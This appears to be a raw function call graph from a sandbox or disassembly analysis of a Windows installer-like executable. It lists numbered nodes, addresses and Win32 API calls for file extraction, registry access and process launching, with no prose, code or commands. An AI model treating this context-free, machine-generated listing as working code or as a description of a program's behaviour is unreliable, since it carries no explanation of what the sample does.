3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3654 406009 lstrcpynW 3519->3654 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3532 406805 18 API calls 3529->3532 3534 403bad CloseHandle 3529->3534 3682 406805 3529->3682 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3530->3483 3532->3529 3534->3529 3536 406314 LoadLibraryA 3535->3536 3537 40631f GetProcAddress 3535->3537 3536->3537 3538 4038c6 SHGetFileInfoW 3536->3538 3537->3538 3539 406009 lstrcpynW 3538->3539 3539->3466 3540->3468 3542 405d0c 3541->3542 3543 40392a CharNextW 3542->3543 3544 405d13 CharNextW 3542->3544 3543->3485 3544->3542 3712 406038 3545->3712 3547 4037e2 3547->3475 3548 4037d8 3548->3547 3721 406722 lstrlenW CharPrevW 3548->3721 3728 405e50 GetFileAttributesW CreateFileW 3553->3728 3555 4035c7 3576 4035d7 3555->3576 3729 406009 lstrcpynW 3555->3729 3557 4035ed 3730 406751 lstrlenW 3557->3730 3561 4035fe GetFileSize 3562 4036fa 3561->3562 3575 403615 3561->3575 3737 4032d2 3562->3737 3564 403703 3566 40373f GlobalAlloc 3564->3566 3564->3576 3771 403368 SetFilePointer 3564->3771 3748 403368 SetFilePointer 3566->3748 3568 4037bd 3572 4032d2 6 API calls 3568->3572 3570 40375a 3749 40337f 3570->3749 3571 403720 3574 403336 ReadFile 3571->3574 3572->3576 3577 40372b 3574->3577 3575->3562 3575->3568 3575->3576 3578 4032d2 6 API calls 3575->3578 3735 403336 ReadFile 3575->3735 3576->3482 3577->3566 3577->3576 3578->3575 3579 403766 3579->3576 3579->3579 3580 403794 SetFilePointer 3579->3580 3580->3576 3582 4062fc 3 API calls 3581->3582 3583 405940 3582->3583 3584 405946 3583->3584 3585 405958 3583->3585 3812 405f51 wsprintfW 3584->3812 3813 405ed3 RegOpenKeyExW 3585->3813 3589 4059a8 lstrcatW 3591 405956 3589->3591 3590 405ed3 3 API calls 3590->3589 3795 403e95 3591->3795 3594 40677e 18 API calls 3595 4059da 3594->3595 3596 405a70 3595->3596 3598 405ed3 3 API calls 3595->3598 3597 40677e 18 API calls 3596->3597 3599 405a76 3597->3599 3600 405a0c 3598->3600 3601 405a86 3599->3601 3602 406805 18 API calls 3599->3602 3600->3596 3606 405a2f lstrlenW 3600->3606 3612 405d06 CharNextW 3600->3612 3603 405aa6 LoadImageW 3601->3603 3819 403e74 3601->3819 3602->3601 3604 405ad1 RegisterClassW 3603->3604 3605 405b66 3603->3605 3610 405b19 SystemParametersInfoW CreateWindowExW 3604->3610 3635 405b70 3604->3635 3611 40141d 80 API calls 3605->3611 3607 405a63 3606->3607 3608 405a3d lstrcmpiW 3606->3608 3615 406722 3 API calls 3607->3615 3608->3607 3613 405a4d GetFileAttributesW 3608->3613 3610->3605 3616 405b6c 3611->3616 3617 405a2a 3612->3617 3618 405a59 3613->3618 3614 405a9c 3614->3603 3619 405a69 3615->3619 3622 403e95 19 API calls 3616->3622 3616->3635 3617->3606 3618->3607 3620 406751 2 API calls 3618->3620 3818 406009 lstrcpynW 3619->3818 3620->3607 3623 405b7d 3622->3623 3624 405b89 ShowWindow LoadLibraryW 3623->3624 3625 405c0c 3623->3625 3627 405ba8 LoadLibraryW 3624->3627 3628 405baf GetClassInfoW 3624->3628 3804 405047 OleInitialize 3625->3804 3627->3628 3629 405bc3 GetClassInfoW RegisterClassW 3628->3629 3630 405bd9 DialogBoxParamW 3628->3630 3629->3630 3632 40141d 80 API calls 3630->3632 3631 405c12 3633 405c16 3631->3633 3634 405c2e 3631->3634 3632->3635 3633->3635 3637 40141d 80 API calls 3633->3637 3636 40141d 80 API calls 3634->3636 3635->3490 3636->3635 3637->3635 3638->3473 3964 406009 lstrcpynW 3639->3964 3641 40678f 3642 405d59 4 API calls 3641->3642 3643 406795 3642->3643 3644 406038 5 API calls 3643->3644 3651 403a97 3643->3651 3650 4067a5 3644->3650 3645 4067dd lstrlenW 3646 4067e4 3645->3646 3645->3650 3647 406722 3 API calls 3646->3647 3649 4067ea GetFileAttributesW 3647->3649 3648 4062d5 2 API calls 3648->3650 3649->3651 3650->3645 3650->3648 3650->3651 3652 406751 2 API calls 3650->3652 3651->3483 3653 406009 lstrcpynW 3651->3653 3652->3645 3653->3519 3654->3486 3656 406110 3655->3656 3657 4060f3 3655->3657 3659 406187 3656->3659 3660 40612d 3656->3660 3663 406104 3656->3663 3658 4060fd CloseHandle 3657->3658 3657->3663 3658->3663 3661 406190 lstrcatW lstrlenW WriteFile 3659->3661 3659->3663 3660->3661 3662 406136 GetFileAttributesW 3660->3662 3661->3663 3965 405e50 GetFileAttributesW CreateFileW 3662->3965 3663->3483 3665 406152 3665->3663 3666 406162 WriteFile 3665->3666 3667 40617c SetFilePointer 3665->3667 3666->3667 3667->3659 3669 403871 3668->3669 3670 403863 CloseHandle 3668->3670 3966 403c83 3669->3966 3670->3669 3676 405cb5 3675->3676 3677 403aef ExitProcess 3676->3677 3678 405ccb MessageBoxIndirectW 3676->3678 3678->3677 3679->3509 3680->3514 3681->3529 3695 406812 3682->3695 3683 406a7f 3684 403b6c DeleteFileW 3683->3684 4023 406009 lstrcpynW 3683->4023 3684->3527 3684->3529 3686 4068d3 GetVersion 3698 4068e0 3686->3698 3687 406a46 lstrlenW 3687->3695 3688 406805 10 API calls 3688->3687 3691 405ed3 3 API calls 3691->3698 3692 406952 GetSystemDirectoryW 3692->3698 3693 406965 GetWindowsDirectoryW 3693->3698 3694 406038 5 API calls 3694->3695 3695->3683 3695->3686 3695->3687 3695->3688 3695->3694 4021 405f51 wsprintfW 3695->4021 4022 406009 lstrcpynW 3695->4022 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3695 3698->3691 3698->3692 3698->3693 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4024 406a99 lstrcpyW 3703->4024 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3548 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3555 3729->3557 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3561 3736 403357 3735->3736 3736->3575 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3564 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3564 3748->3570 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3579 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3571 3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3564 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3594 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3631 3809->3806 3811->3807 3812->3591 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3589 3815->3590 3816->3815 3818->3596 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3614 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3953 405d88 3951->3953 3952->3953 3954 405d83 CharNextW 3952->3954 3955 405dac 3953->3955 3956 405d06 CharNextW 3953->3956 3954->3955 3955->3910 3956->3953 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3964->3641 3965->3665 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4012 403882 OleUninitialize 3973->4012 3975 406e3b 3974->3975 4016 406009 lstrcpynW 3974->4016 3981 4062d5 2 API calls 3975->3981 4001 406e58 3975->4001 3975->4012 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3986 406d2b lstrlenW FindFirstFileW 3980->3986 3983 406e64 3981->3983 3982->3980 3987 406722 3 API calls 3983->3987 3983->4012 3984->3986 3985 4062a3 11 API calls 3985->4012 3986->3975 3991 406d52 3986->3991 3988 406e6e 3987->3988 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3975 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3985 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3977 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3695 4022->3695 4023->3684 4025 406ae7 GetShortPathNameW 4024->4025 4026 406abe 4024->4026 4027 406b00 4025->4027 4028 406c62 4025->4028 4050 405e50 GetFileAttributesW CreateFileW 4026->4050 4027->4028 4030 406b08 WideCharToMultiByte 4027->4030 4028->3705 4030->4028 4032 406b25 WideCharToMultiByte 4030->4032 4031 406ac7 CloseHandle GetShortPathNameW 4031->4028 4033 406adf 4031->4033 4032->4028 4034 406b3d wsprintfA 4032->4034 4033->4025 4033->4028 4035 406805 18 API calls 4034->4035 4036 406b69 4035->4036 4051 405e50 GetFileAttributesW CreateFileW 4036->4051 4038 406b76 4038->4028 4039 406b83 GetFileSize GlobalAlloc 4038->4039 4040 406ba4 ReadFile 4039->4040 4041 406c58 CloseHandle 4039->4041 4040->4041 4042 406bbe 4040->4042 4041->4028 4042->4041 4052 405db6 lstrlenA 4042->4052 4045 406bd7 lstrcpyA 4048 406bf9 4045->4048 4046 406beb 4047 405db6 4 API calls 4046->4047 4047->4048 4049 406c30 SetFilePointer WriteFile GlobalFree 4048->4049 4049->4041 4050->4031 4051->4038 4053 405df7 lstrlenA 4052->4053 4054 405dd0 lstrcmpiA 4053->4054 4055 405dff 4053->4055 4054->4055 4056 405dee CharNextA 4054->4056 4055->4045 4055->4046 4056->4053 4938 402a84 4939 401553 19 API calls 4938->4939 4940 402a8e 4939->4940 4941 401446 18 API calls 4940->4941 4942 402a98 4941->4942 4943 401a13 4942->4943 4944 402ab2 RegEnumKeyW 4942->4944 4945 402abe RegEnumValueW 4942->4945 4946 402a7e 4944->4946 4945->4943 4945->4946 4946->4943 4947 4029e4 RegCloseKey 4946->4947 4947->4943 4948 402c8a 4949 402ca2 4948->4949 4950 402c8f 4948->4950 4952 40145c 18 API calls 4949->4952 4951 401446 18 API calls 4950->4951 4954 402c97 4951->4954 4953 402ca9 lstrlenW 4952->4953 4953->4954 4955 402ccb WriteFile 4954->4955 4956 401a13 4954->4956 4955->4956 4957 40400d 4958 40406a 4957->4958 4959 40401a lstrcpynA lstrlenA 4957->4959 4959->4958 4960 40404b 4959->4960 4960->4958 4961 404057 GlobalFree 4960->4961 4961->4958 4962 401d8e 4963 40145c 18 API calls 4962->4963 4964 401d95 ExpandEnvironmentStringsW 4963->4964 4965 401da8 4964->4965 4967 401db9 4964->4967 4966 401dad lstrcmpW 4965->4966 4965->4967 4966->4967 4968 401e0f 4969 401446 18 API calls 4968->4969 4970 401e17 4969->4970 4971 401446 18 API calls 4970->4971 4972 401e21 4971->4972 4973 4030e3 4972->4973 4975 405f51 wsprintfW 4972->4975 4975->4973 4976 402392 4977 40145c 18 API calls 4976->4977 4978 402399 4977->4978 4981 4071f8 4978->4981 4982 406ed2 25 API calls 4981->4982 4983 407218 4982->4983 4984 407222 lstrcpynW lstrcmpW 4983->4984 4985 4023a7 4983->4985 4986 407254 4984->4986 4987 40725a lstrcpynW 4984->4987 4986->4987 4987->4985 4057 402713 4072 406009 lstrcpynW 4057->4072 4059 40272c 4073 406009 lstrcpynW 4059->4073 4061 402738 4062 40145c 18 API calls 4061->4062 4064 402743 4061->4064 4062->4064 4063 402752 4066 40145c 18 API calls 4063->4066 4068 402761 4063->4068 4064->4063 4065 40145c 18 API calls 4064->4065 4065->4063 4066->4068 4067 40145c 18 API calls 4069 40276b 4067->4069 4068->4067 4070 4062a3 11 API calls 4069->4070 4071 40277f WritePrivateProfileStringW 4070->4071 4072->4059 4073->4061 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4285 401a1f 4286 40145c 18 API calls 4285->4286 4287 401a26 4286->4287 4288 4062a3 11 API calls 4287->4288 4289 401a49 4288->4289 4290 401a64 4289->4290 4291 401a5c 4289->4291 4339 406009 lstrcpynW 4290->4339 4338 406009 lstrcpynW 4291->4338 4294 401a62 4298 406038 5 API calls 4294->4298 4295 401a6f 4296 406722 3 API calls 4295->4296 4297 401a75 lstrcatW 4296->4297 4297->4294 4300 401a81 4298->4300 4299 4062d5 2 API calls 4299->4300 4300->4299 4301 405e30 2 API calls 4300->4301 4303 401a98 CompareFileTime 4300->4303 4304 401ba9 4300->4304 4308 4062a3 11 API calls 4300->4308 4312 406009 lstrcpynW 4300->4312 4318 406805 18 API calls 4300->4318 4325 405ca0 MessageBoxIndirectW 4300->4325 4329 401b50 4300->4329 4336 401b5d 4300->4336 4337 405e50 GetFileAttributesW CreateFileW 4300->4337 4301->4300 4303->4300 4305 404f72 25 API calls 4304->4305 4307 401bb3 4305->4307 4306 404f72 25 API calls 4309 401b70 4306->4309 4310 40337f 37 API calls 4307->4310 4308->4300 4313 4062a3 11 API calls 4309->4313 4311 401bc6 4310->4311 4314 4062a3 11 API calls 4311->4314 4312->4300 4320 401b8b 4313->4320 4315 401bda 4314->4315 4316 401be9 SetFileTime 4315->4316 4317 401bf8 CloseHandle 4315->4317 4316->4317 4319 401c09 4317->4319 4317->4320 4318->4300 4321 401c21 4319->4321 4322 401c0e 4319->4322 4324 406805 18 API calls 4321->4324 4323 406805 18 API calls 4322->4323 4326 401c16 lstrcatW 4323->4326 4327 401c29 4324->4327 4325->4300 4326->4327 4328 4062a3 11 API calls 4327->4328 4330 401c34 4328->4330 4331 401b93 4329->4331 4332 401b53 4329->4332 4333 405ca0 MessageBoxIndirectW 4330->4333 4334 4062a3 11 API calls 4331->4334 4335 4062a3 11 API calls 4332->4335 4333->4320 4334->4320 4335->4336 4336->4306 4337->4300 4338->4294 4339->4295 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 KiUserCallbackDispatcher 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4084 4021b5 4085 40145c 18 API calls 4084->4085 4086 4021bb 4085->4086 4087 40145c 18 API calls 4086->4087 4088 4021c4 4087->4088 4089 40145c 18 API calls 4088->4089 4090 4021cd 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021d6 4091->4092 4093 404f72 25 API calls 4092->4093 4094 4021e2 ShellExecuteW 4093->4094 4095 40221b 4094->4095 4096 40220d 4094->4096 4098 4062a3 11 API calls 4095->4098 4097 4062a3 11 API calls 4096->4097 4097->4095 4099 402230 4098->4099 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 KiUserCallbackDispatcher 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 KiUserCallbackDispatcher 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc 